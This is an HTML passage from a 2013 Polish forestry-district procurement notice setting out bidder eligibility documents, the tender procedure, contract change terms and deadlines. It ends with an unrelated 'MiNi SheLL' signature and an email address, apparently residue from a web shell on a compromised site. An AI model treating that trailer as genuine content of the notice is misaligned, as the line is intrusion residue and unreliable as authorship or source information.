<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający wymaga, aby Wykonawca w chwili składania oferty posiadał na rachunku bankowym kwotę, co najmniej 400 tys. zł lub posiadał zdolność kredytową w wysokości, przynajmniej 400 tys. zł. na każdą z części zamówienia. Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - przy czym suma ubezpieczenia nie może być niższa od kwoty min. 500 tys. zł. (bez względu na to , czy Wykonawca składa ofertę na jedno zdanie, czy też na oba zadania. W razie przedłożenia informacji z kilku banków /rachunków/ informacje te muszą pochodzić z tego samego dnia i tej samej godziny. Wartość środków powinna być podana w PLN. W wypadku innych walut należy przyjąć przelicznik równy średniemu rocznemu kursowi Europejskiego Banku Centralnego. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.2. Zamawiający przewiduje możliwość zmiany zawartej umowy w nw. przypadkach:
a) za niewykonane prace nie należy się wynagrodzenie,
b) w przypadku wystąpienia robót objętych projektem, a nie ujętych w przedmiarze robót, zamawiający dopuszcza ich rozliczenie przy uwzględnieniu przyjętych do umowy wskaźników kosztorysowych lub w drodze negocjacji (roboty dodatkowe i uzupełniającymi).
c) dopuszcza się zwiększenie lub zmniejszenie wynagrodzenia w sytuacji, gdy obmiary dokonane na gruncie okażą się większe lub mniejsze niż przyjęte w przedmiarze robót.
d) przewiduje się możliwość uzasadnionej zmiany terminu wykonania prac, na skutek okoliczności niezależnych od wykonawcy z przyczyn mających wpływ na terminowość prac lub konieczność wykonania robót uzupełniających i dodatkowych mających wpływ na wydłużenie terminu
e)  wystąpienia okoliczności zawartych w art.145 ust.1 i 2 Prawa zamówień Publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_manowo/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strona internetowa bip-u oraz w Nadlesnictwie Manowo u Pana Ryszarda Trzcińskiego w godz.8-14 po uprzednim zamówieniu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 09:45, miejsce: Sekretariat Nadleśnictwa Manowo w Manowie 54..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com